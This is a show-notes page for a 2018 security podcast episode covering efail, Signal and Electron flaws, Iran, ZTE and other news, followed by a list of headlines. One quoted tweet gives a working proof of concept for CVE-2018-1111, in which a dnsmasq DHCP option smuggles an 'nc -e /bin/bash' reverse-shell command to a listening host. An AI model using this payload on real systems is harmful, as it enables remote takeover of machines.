Risky Business #499 -- Is PGP actually busted and Signal pwnt? Noooope

PLUS: Iran goes berserk while the White House sleeps at the wheel...
16 May 2018 » Risky Business

In this week’s weekly show we’re just going to drill in to the week’s extra long security news section with Adam Boileau then go straight to the sponsor interview. I’ve got a fantastic feature interview for you this week, but I’m going to publish it outside of the news show. It was either that or run stupidly long or cut too much from everything to make it all fit.

This week’s sponsor interview is a good one though. We’re chatting with the team behind DarkTrace. They make a machine learning-backed network monitor. A key different with this kit is it actually gets involved on the network. If it sees something it’s confident is attacker behaviour it will start spraying TCP resets to boot them off the network.

This is something the IPS systems of old used to do but it’s an approach that fell out of favour. We’ll find out why that approach was discarded and why it’s coming back, as well as generally discuss the role of machine learning in security with a company that has invested in it heavily. This isn’t a “for or against” interview segment. This is a discussion with one company that is getting value out of the approach, so stick around for that.

The show notes/news items are below, and you can follow Adam or Patrick on Twitter if that’s your thing.

Show notes

Without Nuclear Deal, U.S. Expects Resurgence in Iranian Cyberattacks - The New York Times
How Two Persian Gulf Nations Turned The US Media Into Their Battleground
National Security Council delays publication of cyber strategy over inclusion of 'offensive' measures
Bolton eliminates White House Cybersecurity Coordinator position
Lawmakers introduce bill to save top White House cyber job after Bolton eliminated it
Ex-CIA employee identified as suspect in 'Vault 7' leaks
Sebastian Schinzel on Twitter: "We'll publish critical vulnerabilities in PGP/GPG and S/MIME email encryption on 2018-05-15 07:00 UTC. They might reveal the plaintext of encrypted emails, including encrypted emails sent in the past. #efail 1/4"
'Efail' exploit can decrypt old emails that were previously encrypted - CyberScoop
Critical PGP and S/MIME bugs can reveal encrypted emails—uninstall now [Updated] | Ars Technica
CVE-2018-1000136 - Electron nodeIntegration Bypass
Security flaw in Electron impacts hundreds of desktop apps
Michael Gianarakis on Twitter: "I don’t know man - as I said I wasn’t involved so I don’t know what was tested and when, what was covered during disclosure etc. All I was saying in my original tweet was that I didn’t read the post to say any specific app was vulnerable or not.… https://t.co/wVmG4FE0yI"
Alfredo Ortega on Twitter: "Remote zero-click JavaScript code execution on signal desktop message app. Thanks @HacKanCuBa and @julianor https://t.co/YgT8akGfBI"
Alfredo Ortega on Twitter: "And we'll release the Signal-Desktop Remote code exec advisory (CVE-2018-10994) in some hours. Not a good week for privacy software. https://t.co/ElysIPAlvo"
It only took five hours to close a critical vulnerability in Signal's desktop client
'Disappearing' Signal Messages Are Stored Indefinitely on Mac Hard Drives - Motherboard
China's ZTE says main operations have ceased after US ban
Lucas Tomlinson on Twitter: "JUST IN: Pentagon orders all stores on U.S. military bases worldwide to ban phones and telecom equipment from Chinese companies Huawei and ZTE, following warnings from top U.S. intelligence officials the Chinese companies could be spying on Americans"
Donald J. Trump on Twitter: "President Xi of China, and I, are working together to give massive Chinese phone company, ZTE, a way to get back into business, fast. Too many jobs in China lost. Commerce Department has been instructed to get it done!"
Microsoft Enabling Javascript in Excel Has Security Pros Anxious | WIRED
Researcher Runs Coinhive Cryptominer in Excel Just Days After Microsoft Announces JavaScript Custom Functions
Researchers Come Up With a Way to Launch Rowhammer Attacks via Network Packets
Georgia governor vetoes cyber bill that would criminalize “unauthorized access” | Ars Technica
Russian Troll Farm Hijacked American Teen Girls’ Computers for Likes
Dutch ditch Kaspersky on fears of Russian government influence
Possible Kaspersky sanctions meet resistance inside U.S. government
Wyden calls for FCC investigation into cell-phone tracking used by law enforcement
Kia‏☆ on Twitter: "this isnt a joke, try out https://t.co/QKa5nNOKjN, you can find the current location of a phone (not just with cell tower info, it can force AGPS) with just *its phone number*; the demo site requires you reply to an SMS but there's no technical requirement against that! https://t.co/kfMDU2qxjZ"
Government would be barred from mandating crypto backdoors under House bill
Symantec's stock plummets after announcement of internal audit
Lawmakers call for action following revelations that APT28 posed as ISIS online
Counterrorism Officials Concerned About Technological Advances of Jihadists in the US
Vigilante Hacks Government-Linked Cyberespionage Group - Motherboard
Pakistani military leverages Facebook Messenger for wide-ranging spyware campaign
DDoS Attacks Leverage UPnP Protocol to Avoid Mitigation
Shadowy Hackers Accidentally Reveal Two Zero-Days to Security Researchers
Windows 10 OpenSSH Client Installed by Default in April 2018 Update
Malicious Apps Get Back on the Play Store Just by Changing Their Name
Multiple OS Vendors Release Security Patches After Misinterpreting Intel Docs
Barkın Kılıç on Twitter: "#CVE-2018-1111 tweetable PoC :) dnsmasq --interface=eth0 --bind-interfaces --except-interface=lo --dhcp-range=10.1.1.1,10.1.1.10,1h --conf-file=/dev/null --dhcp-option=6,10.1.1.1 --dhcp-option=3,10.1.1.1 --dhcp-option="252,x'&nc -e /bin/bash 10.1.1.1 1337 #" cc: @cnbrkbolat… https://t.co/NMthW41Xql"
Morning mail: Ecuador's costly Assange spy operation | Australia news | The Guardian
Evil Mainframe Penetration Testing Classes
Evil Mainframe: Mainframe Penetration Testing Registration, Tue, Jun 12, 2018 at 9:00 AM | Eventbrite
Darktrace